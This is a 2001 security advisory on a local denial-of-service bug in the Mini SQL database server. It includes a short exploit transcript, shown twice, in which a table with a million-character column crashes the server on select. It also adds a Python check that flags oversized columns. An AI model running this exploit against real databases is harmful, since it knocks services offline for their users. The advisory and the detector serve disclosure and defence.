mSQL Database Can Be Crashed By Local Users
SecurityTracker Alert ID: 1003059
SecurityTracker URL: http://securitytracker.com/id/1003059
CVE Reference: GENERIC-MAP-NOMATCH
Date: Dec 27 2001
Impact: Denial of service via local system
Exploit Included: Yes
Description:
A denial of service vulnerability has been reported in the Mini SQL (mSQL) database server. A local user can cause the database to crash.
It is reported that a local user can cause the database to crash by creating a table with a large column.
A demonstration exploit transcript is provided:
mSQL > create table qqq (www char(1000000)) \g
Query OK. 1 row(s) modified or retrieved.
mSQL > select * from qqq \g
ERROR : MSQL server has gone away
[Editor's Note: It is not clear whether one local user can crash the database for sessions belonging to other local users or not.]
Impact:
A local user with privileges to modify the database can cause the database to crash.
Solution:
No solution was available at the time of this entry.
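
With no vendor fix available, one interim check is to screen CREATE TABLE statements for very wide columns before they reach the server. The Python below is an added example, not part of the original advisory or of mSQL; it flags the pattern shown in the transcript. The function name and the 4096 limit are assumptions (a site policy, not a documented safe bound), and the sample statements other than the one from the transcript are constructed.

```python
import re

# Assumed site policy, not a limit documented by the vendor or the advisory.
MAX_COLUMN_WIDTH = 4096

CREATE_RE = re.compile(r"create\s+table\s+(\w+)\s*\((.*)\)", re.IGNORECASE | re.DOTALL)
# Matches "name type(N)" column definitions; unsized types (e.g. int) are skipped.
COLUMN_RE = re.compile(r"(\w+)\s+(\w+)\s*\(\s*(\d+)\s*\)")


def oversized_columns(statement, limit=MAX_COLUMN_WIDTH):
    """Return (table, column, type, width) for each sized column wider than limit."""
    # Drop the monitor's \g terminator before matching.
    text = statement.replace("\\g", "").strip()
    match = CREATE_RE.search(text)
    if match is None:
        return []  # not a CREATE TABLE statement
    table, body = match.group(1), match.group(2)
    findings = []
    for column, ctype, width in COLUMN_RE.findall(body):
        if int(width) > limit:
            findings.append((table, column, ctype.lower(), int(width)))
    return findings


# Constructed sample input: the first statement is the one from the advisory
# transcript; the other two are made up for contrast.
SAMPLE_STATEMENTS = [
    "create table qqq (www char(1000000)) \\g",
    "CREATE TABLE users (id int, name char(64), bio char(8192)) \\g",
    "select * from qqq \\g",
]

if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        for table, column, ctype, width in oversized_columns(stmt):
            print(f"REVIEW {table}.{column}: {ctype}({width}) exceeds {MAX_COLUMN_WIDTH}")
```
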
Vendor URL: www.hughes.com.au/products/msql/
Cause: Not specified
Underlying OS: Linux (Any), UNIX (Any)
Message History: None.
Source Message Contents
Date: Wed, 26 Dec 2001 17:51:37 +0300
Subject: msql DoS
[lesha@lesha /dl]$ /usr/local/Hughes/bin/msql test
Welcome to the miniSQL monitor. Type \h for help.
mSQL > create table qqq (www char(1000000)) \g
Query OK. 1 row(s) modified or retrieved.
mSQL > select * from qqq \g
ERROR : MSQL server has gone away
--